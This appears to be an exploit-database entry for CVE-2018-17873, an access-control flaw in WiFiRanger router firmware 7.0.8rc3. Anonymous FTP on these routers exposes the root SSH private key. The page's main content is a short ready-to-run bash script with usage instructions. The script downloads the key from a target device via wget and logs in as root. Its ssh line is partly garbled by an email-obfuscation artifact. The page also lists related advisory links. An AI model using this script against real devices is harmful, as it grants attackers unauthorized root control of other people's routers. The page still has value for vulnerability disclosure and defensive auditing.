Lucene search
Mitchel Jordan1337DAY-ID-31370HistoryOct 22, 2018 - 12:00 a.m.
WiFiRanger 7.0.8rc3 Incorrect Access Control / Privilege Escalation Vulnerability
2018-10-2200:00:00
Mitchel Jordan
0day.today
43
0.001 Low
EPSS
Percentile
48.8%
WiFiRanger version 7.0.8rc3 suffers from an incorrect access control that allows for ftp retrieval of an RSA identity that an attacker can use to ssh in as root.
# Exploit Title: WiFiRanger 7.0.8rc3 Incorrect Access Control - Privilege Escalation (POC)
# Exploit Author: Mitchel Jordan
# Vendor Homepage: https://wifiranger.com/
# Firmware: Phantom 7.0.8rc3
# CVE: CVE-2018-17873
# Details:
# WiFiRanger indoor routers (Core, GoAC) and their outdoor paired routers (Sky Pro, EliteAC, EliteAC FM) running
# firmware version 7.0.8rc3 and earlier allow anonymous FTP read/write access and have left the SSH Private Key
# in the clear - making it a trivial task to view/copy the key and log in with root privileges.
#
# Adjacent network access required to exploit this vulnerability.
# Exploit:
# Extremely simple shell script that grabs the private key and logs in as root.
#
# Usage: ./wifiRangerPwn.sh <WiFiRanger IP>
#!/bin/bash
wget "ftp://$1/sbc/aff/id_rsa"
chmod 600 id_rsa
ssh -i id_rsa [email protected]$1
# 0day.today [2018-10-22] #Related
prion
prion
Improper access control
2018-10-23 21:30:00
cve
cve
CVE-2018-17873
2018-10-23 21:30:53
cvelist
cvelist
CVE-2018-17873
2018-10-23 21:00:00
packetstorm
packetstorm
WiFiRanger 7.0.8rc3 Incorrect Access Control / Privilege Escalation
2018-10-19 00:00:00
nvd
nvd
CVE-2018-17873
2018-10-23 21:30:53